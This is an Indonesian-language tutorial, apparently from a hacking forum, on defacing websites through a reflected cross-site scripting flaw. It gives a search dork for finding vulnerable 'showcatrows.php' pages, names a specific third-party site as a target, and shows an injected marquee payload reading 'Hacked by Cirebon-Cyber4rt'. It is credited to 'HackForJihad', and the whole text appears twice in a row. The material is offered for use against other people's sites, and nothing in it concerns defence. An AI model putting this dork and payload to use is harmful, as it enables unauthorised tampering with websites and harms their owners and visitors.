1.Pertama Masukin Dorknya
inurl:"/showcatrows.php?CategoryID="
2.Pilih Web yg ingin di deface
Kalo saya pakai ini http://www.examsolutions.co.uk/maths-rev...egoryID=13
3.Jika sudah masuk ke halaman web ,modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.
Kalo saya pake yg simple aja
http://www.examsolutions.co.uk/...?CategoryID=13"><marquee><h1>Hacked by Cirebon-Cyber4rt</h1></marquee>
4.Jika Sudah Tekan "ENTER"
5.Lihat hasil ,apakah yg terjadi
caranya memang sangat simpel, dimana kita memanfaatkan celah keamanan pada XSS sebuah website dengan memasukan sebuah code/script HTML.
Credit : HackForJihad
inurl:"/showcatrows.php?CategoryID="
2.Pilih Web yg ingin di deface
Kalo saya pakai ini http://www.examsolutions.co.uk/maths-rev...egoryID=13
3.Jika sudah masuk ke halaman web ,modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.
Kalo saya pake yg simple aja
http://www.examsolutions.co.uk/...?CategoryID=13"><marquee><h1>Hacked by Cirebon-Cyber4rt</h1></marquee>
4.Jika Sudah Tekan "ENTER"
5.Lihat hasil ,apakah yg terjadi
caranya memang sangat simpel, dimana kita memanfaatkan celah keamanan pada XSS sebuah website dengan memasukan sebuah code/script HTML.
Credit : HackForJihad